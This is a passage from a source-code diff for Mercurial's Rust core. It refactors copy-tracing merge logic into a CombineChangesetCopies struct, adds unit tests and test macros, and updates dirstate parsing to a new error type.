&'a ChangedFiles<'a>, - parent: Parent, - current: u32, -} - -impl<'a> Iterator for ActionsIterator<'a> { - type Item = Action<'a>; - - fn next(&mut self) -> Option<Action<'a>> { - let copy_flag = match self.parent { - Parent::FirstParent => P1_COPY, - Parent::SecondParent => P2_COPY, - }; - while self.current < self.changes.nb_items { - let (flags, file, source) = self.changes.entry(self.current); - self.current += 1; - if (flags & ACTION_MASK) == REMOVED { - return Some(Action::Removed(file)); - } - let copy = flags & COPY_MASK; - if copy == copy_flag { - return Some(Action::Copied(file, source)); - } - } - return None; - } -} - -/// A small struct whose purpose is to ensure lifetime of bytes referenced in -/// ChangedFiles -/// -/// It is passed to the RevInfoMaker callback who can assign any necessary -/// content to the `data` attribute. The copy tracing code is responsible for -/// keeping the DataHolder alive at least as long as the ChangedFiles object. -pub struct DataHolder<D> { - /// RevInfoMaker callback should assign data referenced by the - /// ChangedFiles struct it return to this attribute. The DataHolder - /// lifetime will be at least as long as the ChangedFiles one. - pub data: Option<D>, -} - -pub type RevInfoMaker<'a, D> = - Box<dyn for<'r> Fn(Revision, &'r mut DataHolder<D>) -> RevInfo<'r> + 'a>; - -/// enum used to carry information about the parent → child currently processed -#[derive(Copy, Clone, Debug)] -enum Parent { - /// The `p1(x) → x` edge - FirstParent, - /// The `p2(x) → x` edge - SecondParent, -} - /// A small "tokenizer" responsible of turning full HgPath into lighter /// PathToken /// @@ -345,123 +276,110 @@ } fn untokenize(&self, token: PathToken) -> &HgPathBuf { - assert!(token < self.path.len(), format!("Unknown token: {}", token)); + assert!(token < self.path.len(), "Unknown token: {}", token); &self.path[token] } } /// Same as mercurial.copies._combine_changeset_copies, but in Rust. -/// -/// Arguments are: -/// -/// revs: all revisions to be considered -/// children: a {parent ? [childrens]} mapping -/// target_rev: the final revision we are combining copies to -/// rev_info(rev): callback to get revision information: -/// * first parent -/// * second parent -/// * ChangedFiles -/// isancestors(low_rev, high_rev): callback to check if a revision is an -/// ancestor of another -pub fn combine_changeset_copies<A: Fn(Revision, Revision) -> bool, D>( - revs: Vec<Revision>, - mut children_count: HashMap<Revision, usize>, - target_rev: Revision, - rev_info: RevInfoMaker<D>, - is_ancestor: &A, -) -> PathCopies { - let mut all_copies = HashMap::new(); - let mut oracle = AncestorOracle::new(is_ancestor); - - let mut path_map = TwoWayPathMap::default(); - - for rev in revs { - let mut d: DataHolder<D> = DataHolder { data: None }; - let (p1, p2, changes) = rev_info(rev, &mut d); +pub struct CombineChangesetCopies { + all_copies: HashMap<Revision, InternalPathCopies>, + path_map: TwoWayPathMap, + children_count: HashMap<Revision, usize>, +} - // We will chain the copies information accumulated for the parent with - // the individual copies information the curent revision. Creating a - // new TimeStampedPath for each `rev` → `children` vertex. - let mut copies: Option<TimeStampedPathCopies> = None; - if p1 != NULL_REVISION { - // Retrieve data computed in a previous iteration - let parent_copies = get_and_clean_parent_copies( - &mut all_copies, - &mut children_count, - p1, - ); - if let Some(parent_copies) = parent_copies { - // combine it with data for that revision - let vertex_copies = add_from_changes( - &mut path_map, - &mut oracle, - &parent_copies, - &changes, - Parent::FirstParent, - rev, - ); - // keep that data around for potential later combination - copies = Some(vertex_copies); - } - } - if p2 != NULL_REVISION { - // Retrieve data computed in a previous iteration - let parent_copies = get_and_clean_parent_copies( - &mut all_copies, - &mut children_count, - p2, - ); - if let Some(parent_copies) = parent_copies { - // combine it with data for that revision - let vertex_copies = add_from_changes( - &mut path_map, - &mut oracle, - &parent_copies, - &changes, - Parent::SecondParent, - rev, - ); - - copies = match copies { - None => Some(vertex_copies), - // Merge has two parents needs to combines their copy - // information. - // - // If we got data from both parents, We need to combine - // them. - Some(copies) => Some(merge_copies_dict( - &path_map, - rev, - vertex_copies, - copies, - &changes, - &mut oracle, - )), - }; - } - } - match copies { - Some(copies) => { - all_copies.insert(rev, copies); - } - _ => {} +impl CombineChangesetCopies { + pub fn new(children_count: HashMap<Revision, usize>) -> Self { + Self { + all_copies: HashMap::new(), + path_map: TwoWayPathMap::default(), + children_count, } } - // Drop internal information (like the timestamp) and return the final - // mapping. - let tt_result = all_copies - .remove(&target_rev) - .expect("target revision was not processed"); - let mut result = PathCopies::default(); - for (dest, tt_source) in tt_result { - if let Some(path) = tt_source.path { - let path_dest = path_map.untokenize(dest).to_owned(); - let path_path = path_map.untokenize(path).to_owned(); - result.insert(path_dest, path_path); + /// Combined the given `changes` data specific to `rev` with the data + /// previously given for its parents (and transitively, its ancestors). + pub fn add_revision( + &mut self, + rev: Revision, + p1: Revision, + p2: Revision, + changes: ChangedFiles<'_>, + ) { + self.add_revision_inner(rev, p1, p2, changes.iter_actions(), |path| { + changes.get_merge_case(path) + }) + } + + /// Separated out from `add_revsion` so that unit tests can call this + /// without synthetizing a `ChangedFiles` in binary format. + fn add_revision_inner<'a>( + &mut self, + rev: Revision, + p1: Revision, + p2: Revision, + copy_actions: impl Iterator<Item = Action<'a>>, + get_merge_case: impl Fn(&HgPath) -> MergeCase + Copy, + ) { + // Retrieve data computed in a previous iteration + let p1_copies = match p1 { + NULL_REVISION => None, + _ => get_and_clean_parent_copies( + &mut self.all_copies, + &mut self.children_count, + p1, + ), // will be None if the vertex is not to be traversed + }; + let p2_copies = match p2 { + NULL_REVISION => None, + _ => get_and_clean_parent_copies( + &mut self.all_copies, + &mut self.children_count, + p2, + ), // will be None if the vertex is not to be traversed + }; + // combine it with data for that revision + let (p1_copies, p2_copies) = chain_changes( + &mut self.path_map, + p1_copies, + p2_copies, + copy_actions, + rev, + ); + let copies = match (p1_copies, p2_copies) { + (None, None) => None, + (c, None) => c, + (None, c) => c, + (Some(p1_copies), Some(p2_copies)) => Some(merge_copies_dict( + &self.path_map, + rev, + p2_copies, + p1_copies, + get_merge_case, + )), + }; + if let Some(c) = copies { + self.all_copies.insert(rev, c); } } - result + + /// Drop intermediate data (such as which revision a copy was from) and + /// return the final mapping. + pub fn finish(mut self, target_rev: Revision) -> PathCopies { + let tt_result = self + .all_copies + .remove(&target_rev) + .expect("target revision was not processed"); + let mut result = PathCopies::default(); + for (dest, tt_source) in tt_result { + if let Some(path) = tt_source.path { + let path_dest = self.path_map.untokenize(dest).to_owned(); + let path_path = self.path_map.untokenize(path).to_owned(); + result.insert(path_dest, path_path); + } + } + result + } } /// fetch previous computed information @@ -471,68 +389,67 @@ /// /// If parent is not part of the set we are expected to walk, return None. fn get_and_clean_parent_copies( - all_copies: &mut HashMap<Revision, TimeStampedPathCopies>, + all_copies: &mut HashMap<Revision, InternalPathCopies>, children_count: &mut HashMap<Revision, usize>, parent_rev: Revision, -) -> Option<TimeStampedPathCopies> { +) -> Option<InternalPathCopies> { let count = children_count.get_mut(&parent_rev)?; *count -= 1; if *count == 0 { match all_copies.remove(&parent_rev) { Some(c) => Some(c), - None => Some(TimeStampedPathCopies::default()), + None => Some(InternalPathCopies::default()), } } else { match all_copies.get(&parent_rev) { Some(c) => Some(c.clone()), - None => Some(TimeStampedPathCopies::default()), + None => Some(InternalPathCopies::default()), } } } /// Combine ChangedFiles with some existing PathCopies information and return /// the result -fn add_from_changes<A: Fn(Revision, Revision) -> bool>( +fn chain_changes<'a>( path_map: &mut TwoWayPathMap, - oracle: &mut AncestorOracle<A>, - base_copies: &TimeStampedPathCopies, - changes: &ChangedFiles, - parent: Parent, + base_p1_copies: Option<InternalPathCopies>, + base_p2_copies: Option<InternalPathCopies>, + copy_actions: impl Iterator<Item = Action<'a>>, current_rev: Revision, -) -> TimeStampedPathCopies { - let mut copies = base_copies.clone(); - for action in changes.iter_actions(parent) { +) -> (Option<InternalPathCopies>, Option<InternalPathCopies>) { + // Fast path the "nothing to do" case. + if let (None, None) = (&base_p1_copies, &base_p2_copies) { + return (None, None); + } + + let mut p1_copies = base_p1_copies.clone(); + let mut p2_copies = base_p2_copies.clone(); + for action in copy_actions { match action { - Action::Copied(path_dest, path_source) => { - let dest = path_map.tokenize(path_dest); - let source = path_map.tokenize(path_source); - let entry; - if let Some(v) = base_copies.get(&source) { - entry = match &v.path { - Some(path) => Some((*(path)).to_owned()), - None => Some(source.to_owned()), - } - } else { - entry = Some(source.to_owned()); + Action::CopiedFromP1(path_dest, path_source) => { + match &mut p1_copies { + None => (), // This is not a vertex we should proceed. + Some(copies) => add_one_copy( + current_rev, + path_map, + copies, + base_p1_copies.as_ref().unwrap(), + path_dest, + path_source, + ), } - // Each new entry is introduced by the children, we - // record this information as we will need it to take - // the right decision when merging conflicting copy - // information. See merge_copies_dict for details. - match copies.entry(dest) { - Entry::Vacant(slot) => { - let ttpc = TimeStampedPathCopy { - rev: current_rev, - path: entry, - }; - slot.insert(ttpc); - } - Entry::Occupied(mut slot) => { - let mut ttpc = slot.get_mut(); - oracle.record_overwrite(ttpc.rev, current_rev); - ttpc.rev = current_rev; - ttpc.path = entry; - } + } + Action::CopiedFromP2(path_dest, path_source) => { + match &mut p2_copies { + None => (), // This is not a vertex we should proceed. + Some(copies) => add_one_copy( + current_rev, + path_map, + copies, + base_p2_copies.as_ref().unwrap(), + path_dest, + path_source, + ), } } Action::Removed(deleted_path) => { @@ -540,164 +457,131 @@ // // We need to explicitly record them as dropped to // propagate this information when merging two - // TimeStampedPathCopies object. + // InternalPathCopies object. let deleted = path_map.tokenize(deleted_path); - copies.entry(deleted).and_modify(|old| { - oracle.record_overwrite(old.rev, current_rev); - old.rev = current_rev; - old.path = None; - }); + + let p1_entry = match &mut p1_copies { + None => None, + Some(copies) => match copies.entry(deleted) { + Entry::Occupied(e) => Some(e), + Entry::Vacant(_) => None, + }, + }; + let p2_entry = match &mut p2_copies { + None => None, + Some(copies) => match copies.entry(deleted) { + Entry::Occupied(e) => Some(e), + Entry::Vacant(_) => None, + }, + }; + + match (p1_entry, p2_entry) { + (None, None) => (), + (Some(mut e), None) => { + e.get_mut().mark_delete(current_rev) + } + (None, Some(mut e)) => { + e.get_mut().mark_delete(current_rev) + } + (Some(mut e1), Some(mut e2)) => { + let cs1 = e1.get_mut(); + let cs2 = e2.get(); + if cs1 == cs2 { + cs1.mark_delete(current_rev); + } else { + cs1.mark_delete_with_pair(current_rev, &cs2); + } + e2.insert(cs1.clone()); + } + } } } } - copies + (p1_copies, p2_copies) +} + +// insert one new copy information in an InternalPathCopies +// +// This deal with chaining and overwrite. +fn add_one_copy( + current_rev: Revision, + path_map: &mut TwoWayPathMap, + copies: &mut InternalPathCopies, + base_copies: &InternalPathCopies, + path_dest: &HgPath, + path_source: &HgPath, +) { + let dest = path_map.tokenize(path_dest); + let source = path_map.tokenize(path_source); + let entry; + if let Some(v) = base_copies.get(&source) { + entry = match &v.path { + Some(path) => Some((*(path)).to_owned()), + None => Some(source.to_owned()), + } + } else { + entry = Some(source.to_owned()); + } + // Each new entry is introduced by the children, we + // record this information as we will need it to take + // the right decision when merging conflicting copy + // information. See merge_copies_dict for details. + match copies.entry(dest) { + Entry::Vacant(slot) => { + let ttpc = CopySource::new(current_rev, entry); + slot.insert(ttpc); + } + Entry::Occupied(mut slot) => { + let ttpc = slot.get_mut(); + ttpc.overwrite(current_rev, entry); + } + } } /// merge two copies-mapping together, minor and major /// /// In case of conflict, value from "major" will be picked, unless in some /// cases. See inline documentation for details. -fn merge_copies_dict<A: Fn(Revision, Revision) -> bool>( +fn merge_copies_dict( path_map: &TwoWayPathMap, current_merge: Revision, - mut minor: TimeStampedPathCopies, - mut major: TimeStampedPathCopies, - changes: &ChangedFiles, - oracle: &mut AncestorOracle<A>, -) -> TimeStampedPathCopies { - // This closure exist as temporary help while multiple developper are - // actively working on this code. Feel free to re-inline it once this - // code is more settled. - let mut cmp_value = - |dest: &PathToken, - src_minor: &TimeStampedPathCopy, - src_major: &TimeStampedPathCopy| { - compare_value( - path_map, - current_merge, - changes, - oracle, - dest, - src_minor, - src_major, - ) - }; - if minor.is_empty() { - major - } else if major.is_empty() { - minor - } else if minor.len() * 2 < major.len() { - // Lets says we are merging two TimeStampedPathCopies instance A and B. - // - // If A contains N items, the merge result will never contains more - // than N values differents than the one in A - // - // If B contains M items, with M > N, the merge result will always - // result in a minimum of M - N value differents than the on in - // A - // - // As a result, if N < (M-N), we know that simply iterating over A will - // yield less difference than iterating over the difference - // between A and B. - // - // This help performance a lot in case were a tiny - // TimeStampedPathCopies is merged with a much larger one. - for (dest, src_minor) in minor { - let src_major = major.get(&dest); - match src_major { - None => major.insert(dest, src_minor), - Some(src_major) => { - match cmp_value(&dest, &src_minor, src_major) { - MergePick::Any | MergePick::Major => None, - MergePick::Minor => major.insert(dest, src_minor), - } - } + minor: InternalPathCopies, + major: InternalPathCopies, + get_merge_case: impl Fn(&HgPath) -> MergeCase + Copy, +) -> InternalPathCopies { + use crate::utils::{ordmap_union_with_merge, MergeResult}; + + ordmap_union_with_merge(minor, major, |&dest, src_minor, src_major| { + let (pick, overwrite) = compare_value( + current_merge, + || get_merge_case(path_map.untokenize(dest)), + src_minor, + src_major, + ); + if overwrite { + let (winner, loser) = match pick { + MergePick::Major | MergePick::Any => (src_major, src_minor), + MergePick::Minor => (src_minor, src_major), }; - } - major - } else if major.len() * 2 < minor.len() { - // This use the same rational than the previous block. - // (Check previous block documentation for details.) - for (dest, src_major) in major { - let src_minor = minor.get(&dest); - match src_minor { - None => minor.insert(dest, src_major), - Some(src_minor) => { - match cmp_value(&dest, src_minor, &src_major) { - MergePick::Any | MergePick::Minor => None, - MergePick::Major => minor.insert(dest, src_major), - } + MergeResult::UseNewValue(CopySource::new_from_merge( + current_merge, + winner, + loser, + )) + } else { + match pick { + MergePick::Any | MergePick::Major => { + MergeResult::UseRightValue } - }; - } - minor - } else { - let mut override_minor = Vec::new(); - let mut override_major = Vec::new(); - - let mut to_major = |k: &PathToken, v: &TimeStampedPathCopy| { - override_major.push((k.clone(), v.clone())) - }; - let mut to_minor = |k: &PathToken, v: &TimeStampedPathCopy| { - override_minor.push((k.clone(), v.clone())) - }; - - // The diff function leverage detection of the identical subpart if - // minor and major has some common ancestors. This make it very - // fast is most case. - // - // In case where the two map are vastly different in size, the current - // approach is still slowish because the iteration will iterate over - // all the "exclusive" content of the larger on. This situation can be - // frequent when the subgraph of revision we are processing has a lot - // of roots. Each roots adding they own fully new map to the mix (and - // likely a small map, if the path from the root to the "main path" is - // small. - // - // We could do better by detecting such situation and processing them - // differently. - for d in minor.diff(&major) { - match d { - DiffItem::Add(k, v) => to_minor(k, v), - DiffItem::Remove(k, v) => to_major(k, v), - DiffItem::Update { old, new } => { - let (dest, src_major) = new; - let (_, src_minor) = old; - match cmp_value(dest, src_minor, src_major) { - MergePick::Major => to_minor(dest, src_major), - MergePick::Minor => to_major(dest, src_minor), - // If the two entry are identical, no need to do - // anything (but diff should not have yield them) - MergePick::Any => unreachable!(), - } - } - }; - } - - let updates; - let mut result; - if override_major.is_empty() { - result = major - } else if override_minor.is_empty() { - result = minor - } else { - if override_minor.len() < override_major.len() { - updates = override_minor; - result = minor; - } else { - updates = override_major; - result = major; - } - for (k, v) in updates { - result.insert(k, v); + MergePick::Minor => MergeResult::UseLeftValue, } } - result - } + }) } /// represent the side that should prevail when merging two -/// TimeStampedPathCopies +/// InternalPathCopies +#[derive(Debug, PartialEq)] enum MergePick { /// The "major" (p1) side prevails Major, @@ -709,89 +593,88 @@ /// decide which side prevails in case of conflicting values #[allow(clippy::if_same_then_else)] -fn compare_value<A: Fn(Revision, Revision) -> bool>( - path_map: &TwoWayPathMap, +fn compare_value( current_merge: Revision, - changes: &ChangedFiles, - oracle: &mut AncestorOracle<A>, - dest: &PathToken, - src_minor: &TimeStampedPathCopy, - src_major: &TimeStampedPathCopy, -) -> MergePick { - if src_major.rev == current_merge { - if src_minor.rev == current_merge { - if src_major.path.is_none() { - // We cannot get different copy information for both p1 and p2 - // from the same revision. Unless this was a - // deletion - MergePick::Any - } else { - unreachable!(); - } - } else { - // The last value comes the current merge, this value -will- win - // eventually. - oracle.record_overwrite(src_minor.rev, src_major.rev); - MergePick::Major - } + merge_case_for_dest: impl Fn() -> MergeCase, + src_minor: &CopySource, + src_major: &CopySource, +) -> (MergePick, bool) { + if src_major == src_minor { + (MergePick::Any, false) + } else if src_major.rev == current_merge { + // minor is different according to per minor == major check earlier + debug_assert!(src_minor.rev != current_merge); + + // The last value comes the current merge, this value -will- win + // eventually. + (MergePick::Major, true) } else if src_minor.rev == current_merge { // The last value comes the current merge, this value -will- win // eventually. - oracle.record_overwrite(src_major.rev, src_minor.rev); - MergePick::Minor + (MergePick::Minor, true) } else if src_major.path == src_minor.path { + debug_assert!(src_major.rev != src_major.rev); // we have the same value, but from other source; - if src_major.rev == src_minor.rev { - // If the two entry are identical, they are both valid - MergePick::Any - } else if oracle.is_overwrite(src_major.rev, src_minor.rev) { - MergePick::Minor + if src_major.is_overwritten_by(src_minor) { + (MergePick::Minor, false) + } else if src_minor.is_overwritten_by(src_major) { + (MergePick::Major, false) } else { - MergePick::Major + (MergePick::Any, true) } - } else if src_major.rev == src_minor.rev { - // We cannot get copy information for both p1 and p2 in the - // same rev. So this is the same value. - unreachable!( - "conflict information from p1 and p2 in the same revision" - ); } else { - let dest_path = path_map.untokenize(*dest); - let action = changes.get_merge_case(dest_path); - if src_major.path.is_none() && action == MergeCase::Salvaged { + debug_assert!(src_major.rev != src_major.rev); + let action = merge_case_for_dest(); + if src_minor.path.is_some() + && src_major.path.is_none() + && action == MergeCase::Salvaged + { // If the file is "deleted" in the major side but was // salvaged by the merge, we keep the minor side alive - MergePick::Minor - } else if src_minor.path.is_none() && action == MergeCase::Salvaged { + (MergePick::Minor, true) + } else if src_major.path.is_some() + && src_minor.path.is_none() + && action == MergeCase::Salvaged + { // If the file is "deleted" in the minor side but was // salvaged by the merge, unconditionnaly preserve the // major side. - MergePick::Major - } else if action == MergeCase::Merged { - // If the file was actively merged, copy information - // from each side might conflict. The major side will - // win such conflict. - MergePick::Major - } else if oracle.is_overwrite(src_major.rev, src_minor.rev) { - // If the minor side is strictly newer than the major - // side, it should be kept. - MergePick::Minor - } else if src_major.path.is_some() { - // without any special case, the "major" value win - // other the "minor" one. - MergePick::Major - } else if oracle.is_overwrite(src_minor.rev, src_major.rev) { - // the "major" rev is a direct ancestors of "minor", - // any different value should - // overwrite - MergePick::Major + (MergePick::Major, true) + } else if src_minor.is_overwritten_by(src_major) { + // The information from the minor version are strictly older than + // the major version + if action == MergeCase::Merged { + // If the file was actively merged, its means some non-copy + // activity happened on the other branch. It + // mean the older copy information are still relevant. + // + // The major side wins such conflict. + (MergePick::Major, true) + } else { + // No activity on the minor branch, pick the newer one. + (MergePick::Major, false) + } + } else if src_major.is_overwritten_by(src_minor) { + if action == MergeCase::Merged { + // If the file was actively merged, its means some non-copy + // activity happened on the other branch. It + // mean the older copy information are still relevant. + // + // The major side wins such conflict. + (MergePick::Major, true) + } else { + // No activity on the minor branch, pick the newer one. + (MergePick::Minor, false) + } + } else if src_minor.path.is_none() { + // the minor side has no relevant information, pick the alive one + (MergePick::Major, true) + } else if src_major.path.is_none() { + // the major side has no relevant information, pick the alive one + (MergePick::Minor, true) } else { - // major version is None (so the file was deleted on - // that branch) and that branch is independant (neither - // minor nor major is an ancestors of the other one.) - // We preserve the new - // information about the new file. - MergePick::Minor + // by default the major side wins + (MergePick::Major, true) } } } diff --git a/rust/hg-core/src/copy_tracing/tests.rs b/rust/hg-core/src/copy_tracing/tests.rs new file mode 100644 --- /dev/null +++ b/rust/hg-core/src/copy_tracing/tests.rs @@ -0,0 +1,141 @@ +use super::*; + +/// Unit tests for: +/// +/// ```ignore +/// fn compare_value( +/// current_merge: Revision, +/// merge_case_for_dest: impl Fn() -> MergeCase, +/// src_minor: &CopySource, +/// src_major: &CopySource, +/// ) -> (MergePick, /* overwrite: */ bool) +/// ``` +#[test] +fn test_compare_value() { + // The `compare_value!` macro calls the `compare_value` function with + // arguments given in pseudo-syntax: + // + // * For `merge_case_for_dest` it takes a plain `MergeCase` value instead + // of a closure. + // * `CopySource` values are represented as `(rev, path, overwritten)` + // tuples of type `(Revision, Option<PathToken>, OrdSet<Revision>)`. + // * `PathToken` is an integer not read by `compare_value`. It only checks + // for `Some(_)` indicating a file copy v.s. `None` for a file deletion. + // * `OrdSet<Revision>` is represented as a Python-like set literal. + + use MergeCase::*; + use MergePick::*; + + assert_eq!( + compare_value!(1, Normal, (1, None, { 1 }), (1, None, { 1 })), + (Any, false) + ); +} + +/// Unit tests for: +/// +/// ```ignore +/// fn merge_copies_dict( +/// path_map: &TwoWayPathMap, // Not visible in test cases +/// current_merge: Revision, +/// minor: InternalPathCopies, +/// major: InternalPathCopies, +/// get_merge_case: impl Fn(&HgPath) -> MergeCase + Copy, +/// ) -> InternalPathCopies +/// ``` +#[test] +fn test_merge_copies_dict() { + // The `merge_copies_dict!` macro calls the `merge_copies_dict` function + // with arguments given in pseudo-syntax: + // + // * `TwoWayPathMap` and path tokenization are implicitly taken care of. + // All paths are given as string literals. + // * Key-value maps are represented with `{key1 => value1, key2 => value2}` + // pseudo-syntax. + // * `InternalPathCopies` is a map of copy destination path keys to + // `CopySource` values. + // - `CopySource` is represented as a `(rev, source_path, overwritten)` + // tuple of type `(Revision, Option<Path>, OrdSet<Revision>)`. + // - Unlike in `test_compare_value`, source paths are string literals. + // - `OrdSet<Revision>` is again represented as a Python-like set + // literal. + // * `get_merge_case` is represented as a map of copy destination path to + // `MergeCase`. The default for paths not in the map is + // `MergeCase::Normal`. + // + // `internal_path_copies!` creates an `InternalPathCopies` value with the + // same pseudo-syntax as in `merge_copies_dict!`. + + use MergeCase::*; + + assert_eq!( + merge_copies_dict!( + 1, + {"foo" => (1, None, {})}, + {}, + {"foo" => Merged} + ), + internal_path_copies!("foo" => (1, None, {})) + ); +} + +/// Unit tests for: +/// +/// ```ignore +/// impl CombineChangesetCopies { +/// fn new(children_count: HashMap<Revision, usize>) -> Self +/// +/// // Called repeatedly: +/// fn add_revision_inner<'a>( +/// &mut self, +/// rev: Revision, +/// p1: Revision, +/// p2: Revision, +/// copy_actions: impl Iterator<Item = Action<'a>>, +/// get_merge_case: impl Fn(&HgPath) -> MergeCase + Copy, +/// ) +/// +/// fn finish(mut self, target_rev: Revision) -> PathCopies +/// } +/// ``` +#[test] +fn test_combine_changeset_copies() { + // `combine_changeset_copies!` creates a `CombineChangesetCopies` with + // `new`, then calls `add_revision_inner` repeatedly, then calls `finish` + // for its return value. + // + // All paths given as string literals. + // + // * Key-value maps are represented with `{key1 => value1, key2 => value2}` + // pseudo-syntax. + // * `children_count` is a map of revision numbers to count of children in + // the DAG. It includes all revisions that should be considered by the + // algorithm. + // * Calls to `add_revision_inner` are represented as an array of anonymous + // structs with named fields, one pseudo-struct per call. + // + // `path_copies!` creates a `PathCopies` value, a map of copy destination + // keys to copy source values. Note: the arrows for map literal syntax + // point **backwards** compared to the logical direction of copy! + + use crate::NULL_REVISION as NULL; + use Action::*; + use MergeCase::*; + + assert_eq!( + combine_changeset_copies!( + { 1 => 1, 2 => 1 }, + [ + { rev: 1, p1: NULL, p2: NULL, actions: [], merge_cases: {}, }, + { rev: 2, p1: NULL, p2: NULL, actions: [], merge_cases: {}, }, + { + rev: 3, p1: 1, p2: 2, + actions: [CopiedFromP1("destination.txt", "source.txt")], + merge_cases: {"destination.txt" => Merged}, + }, + ], + 3, + ), + path_copies!("destination.txt" => "source.txt") + ); +} diff --git a/rust/hg-core/src/copy_tracing/tests_support.rs b/rust/hg-core/src/copy_tracing/tests_support.rs new file mode 100644 --- /dev/null +++ b/rust/hg-core/src/copy_tracing/tests_support.rs @@ -0,0 +1,199 @@ +//! Supporting macros for `tests.rs` in the same directory. +//! See comments there for usage. + +/// Python-like set literal +macro_rules! set { + ( + $Type: ty { + $( $value: expr ),* $(,)? + } + ) => {{ + #[allow(unused_mut)] + let mut set = <$Type>::new(); + $( set.insert($value); )* + set + }} +} + +/// `{key => value}` map literal +macro_rules! map { + ( + $Type: ty { + $( $key: expr => $value: expr ),* $(,)? + } + ) => {{ + #[allow(unused_mut)] + let mut set = <$Type>::new(); + $( set.insert($key, $value); )* + set + }} +} + +macro_rules! copy_source { + ($rev: expr, $path: expr, $overwritten: tt) => { + CopySource { + rev: $rev, + path: $path, + overwritten: set!(OrdSet<Revision> $overwritten), + } + }; +} + +macro_rules! compare_value { + ( + $merge_revision: expr, + $merge_case_for_dest: ident, + ($min_rev: expr, $min_path: expr, $min_overwrite: tt), + ($maj_rev: expr, $maj_path: expr, $maj_overwrite: tt) $(,)? + ) => { + compare_value( + $merge_revision, + || $merge_case_for_dest, + ©_source!($min_rev, $min_path, $min_overwrite), + ©_source!($maj_rev, $maj_path, $maj_overwrite), + ) + }; +} + +macro_rules! tokenized_path_copies { + ( + $path_map: ident, {$( + $dest: expr => ( + $src_rev: expr, + $src_path: expr, + $src_overwrite: tt + ) + ),*} + $(,)* + ) => { + map!(InternalPathCopies {$( + $path_map.tokenize(HgPath::new($dest)) => + copy_source!( + $src_rev, + Option::map($src_path, |p: &str| { + $path_map.tokenize(HgPath::new(p)) + }), + $src_overwrite + ) + )*}) + } +} + +macro_rules! merge_case_callback { + ( + $( $merge_path: expr => $merge_case: ident ),* + $(,)? + ) => { + #[allow(unused)] + |merge_path| -> MergeCase { + $( + if (merge_path == HgPath::new($merge_path)) { + return $merge_case + } + )* + MergeCase::Normal + } + }; +} + +macro_rules! merge_copies_dict { + ( + $current_merge: expr, + $minor_copies: tt, + $major_copies: tt, + $get_merge_case: tt $(,)? + ) => { + { + #[allow(unused_mut)] + let mut map = TwoWayPathMap::default(); + let minor = tokenized_path_copies!(map, $minor_copies); + let major = tokenized_path_copies!(map, $major_copies); + merge_copies_dict( + &map, $current_merge, minor, major, + merge_case_callback! $get_merge_case, + ) + .into_iter() + .map(|(token, source)| { + ( + map.untokenize(token).to_string(), + ( + source.rev, + source.path.map(|t| map.untokenize(t).to_string()), + source.overwritten.into_iter().collect(), + ), + ) + }) + .collect::<OrdMap<_, _>>() + } + }; +} + +macro_rules! internal_path_copies { + ( + $( + $dest: expr => ( + $src_rev: expr, + $src_path: expr, + $src_overwrite: tt $(,)? + ) + ),* + $(,)* + ) => { + map!(OrdMap<_, _> {$( + String::from($dest) => ( + $src_rev, + $src_path, + set!(OrdSet<Revision> $src_overwrite) + ) + ),*}) + }; +} + +macro_rules! combine_changeset_copies { + ( + $children_count: tt, + [ + $( + { + rev: $rev: expr, + p1: $p1: expr, + p2: $p2: expr, + actions: [ + $( + $Action: ident($( $action_path: expr ),+) + ),* + $(,)? + ], + merge_cases: $merge: tt + $(,)? + } + ),* + $(,)? + ], + $target_rev: expr $(,)* + ) => {{ + let count = map!(HashMap<Revision, usize> $children_count); + let mut combine_changeset_copies = CombineChangesetCopies::new(count); + $( + let actions = vec![$( + $Action($( HgPath::new($action_path) ),*) + ),*]; + combine_changeset_copies.add_revision_inner( + $rev, $p1, $p2, actions.into_iter(), + merge_case_callback! $merge + ); + )* + combine_changeset_copies.finish($target_rev) + }}; +} + +macro_rules! path_copies { + ( + $( $expected_destination: expr => $expected_source: expr ),* $(,)? + ) => { + map!(PathCopies {$( + HgPath::new($expected_destination).to_owned() + => HgPath::new($expected_source).to_owned(), + ),*}) + }; +} diff --git a/rust/hg-core/src/dirstate.rs b/rust/hg-core/src/dirstate.rs --- a/rust/hg-core/src/dirstate.rs +++ b/rust/hg-core/src/dirstate.rs @@ -5,21 +5,23 @@ // This software may be used and distributed according to the terms of the // GNU General Public License version 2 or any later version. -use crate::{utils::hg_path::HgPathBuf, DirstateParseError, FastHashMap}; +use crate::errors::HgError; +use crate::revlog::Node; +use crate::{utils::hg_path::HgPathBuf, FastHashMap}; +use bytes_cast::{unaligned, BytesCast}; use std::collections::hash_map; use std::convert::TryFrom; pub mod dirs_multiset; pub mod dirstate_map; -#[cfg(feature = "dirstate-tree")] -pub mod dirstate_tree; pub mod parsers; pub mod status; -#[derive(Debug, PartialEq, Clone)] +#[derive(Debug, PartialEq, Clone, BytesCast)] +#[repr(C)] pub struct DirstateParents { - pub p1: [u8; 20], - pub p2: [u8; 20], + pub p1: Node, + pub p2: Node, } /// The C implementation uses all signed types. This will be an issue @@ -33,20 +35,24 @@ pub size: i32, } +#[derive(BytesCast)] +#[repr(C)] +struct RawEntry { + state: u8, + mode: unaligned::I32Be, + size: unaligned::I32Be, + mtime: unaligned::I32Be, + length: unaligned::I32Be, +} + /// A `DirstateEntry` with a size of `-2` means that it was merged from the /// other parent. This allows revert to pick the right status back during a /// merge. pub const SIZE_FROM_OTHER_PARENT: i32 = -2; -#[cfg(not(feature = "dirstate-tree"))] pub type StateMap = FastHashMap<HgPathBuf, DirstateEntry>; -#[cfg(not(feature = "dirstate-tree"))] pub type StateMapIter<'a> = hash_map::Iter<'a, HgPathBuf, DirstateEntry>; -#[cfg(feature = "dirstate-tree")] -pub type StateMap = dirstate_tree::tree::Tree; -#[cfg(feature = "dirstate-tree")] -pub type StateMapIter<'a> = dirstate_tree::iter::Iter<'a>; pub type CopyMap = FastHashMap<HgPathBuf, HgPathBuf>; pub type CopyMapIter<'a> = hash_map::Iter<'a, HgPathBuf, HgPathBuf>; @@ -60,7 +66,7 @@ } impl TryFrom<u8> for EntryState { - type Error = DirstateParseError; + type Error = HgError; fn try_from(value: u8) -> Result<Self, Self::Error> { match value { @@ -69,8 +75,8 @@ b'r' => Ok(EntryState::Removed), b'm' => Ok(EntryState::Merged), b'?' => Ok(EntryState::Unknown), - _ => Err(DirstateParseError::CorruptedEntry(format!( - "Incorrect entry state {}", + _ => Err(HgError::CorruptedRepository(format!( + "Incorrect dirstate entry state {}", value ))), } diff --git a/rust/hg-core/src/dirstate/dirs_multiset.rs b/rust/hg-core/src/dirstate/dirs_multiset.rs --- a/rust/hg-core/src/dirstate/dirs_multiset.rs +++ 